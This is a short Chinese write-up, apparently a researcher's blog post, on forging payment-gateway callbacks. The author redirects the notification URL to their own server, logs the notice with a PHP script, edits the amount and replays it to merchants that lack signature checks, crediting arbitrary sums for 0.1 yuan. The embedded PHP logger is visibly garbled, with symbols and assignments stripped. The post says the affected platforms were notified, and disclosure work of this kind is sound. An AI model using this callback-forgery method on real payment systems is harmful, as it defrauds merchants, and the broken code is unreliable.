一次奇葩支付网关漏洞

我是如何搞这个充值漏洞的

修改请求的通知回调URL改为自己的URL代码在下面

回调地址还有验证是否是用户的地址用户地址我的地址

成功可以绕过让用户地址当AUTH用户名用。

?php$(,r$(,w)(!if($){($myfile,Post:

.$result.

}if(var_export($_GET,true)){fwrite($myfile,Get:

.var_export($_GET,true).

}fwrite($myfile,

Ip:

.getIP());if(getenv(HTTP_HOST)){fwrite($myfile,

Host:

.getenv(HTTP_HOST).

}if(getenv(HTTP_REFERER)){fwrite($myfile,

Referer:

.getenv(HTTP_REFERER).

}if(getenv(SERVER_NAME)){fwrite($myfile,

Name:

.getenv(SERVER_NAME).

}if(getenv(HTTP_USER_AGENT)){fwrite($myfile,

UA:

.getenv(HTTP_USER_AGENT).

}fclose($myfile);echoWelcomefunctiongetIP(){if(getenv(HTTP_CLIENT_IP)){$ipgetenv(HTTP_CLIENT_IP}elseif(getenv(HTTP_X_FORWARDED_FOR)){$ipgetenv(HTTP_X_FORWARDED_FOR}elseif(getenv(HTTP_X_FORWARDED)){$ipgetenv(HTTP_X_FORWARDED}elseif(getenv(HTTP_FORWARDED_FOR)){$ipgetenv(HTTP_FORWARDED_FOR}elseif(getenv(HTTP_FORWARDED)){$ipgetenv(HTTP_FORWARDED}else{$ipgetenv(REMOTE_ADDR}return$ip;}//echo-------\$_GET------------------

//echovar_dump($_GET).

//echo-------php://input-------------

//echo$raw_post_data.

?

充值一毛钱数据将会返回到我的服务器我修改金额后

模拟支付平台通知用户使用这些平台的小公司可没有签名校验的概念他们可能认为平台发的消息永远是对的。造成了可以一毛钱随意充值金额的BUG。

之后已通知这几家平台修复这个漏洞。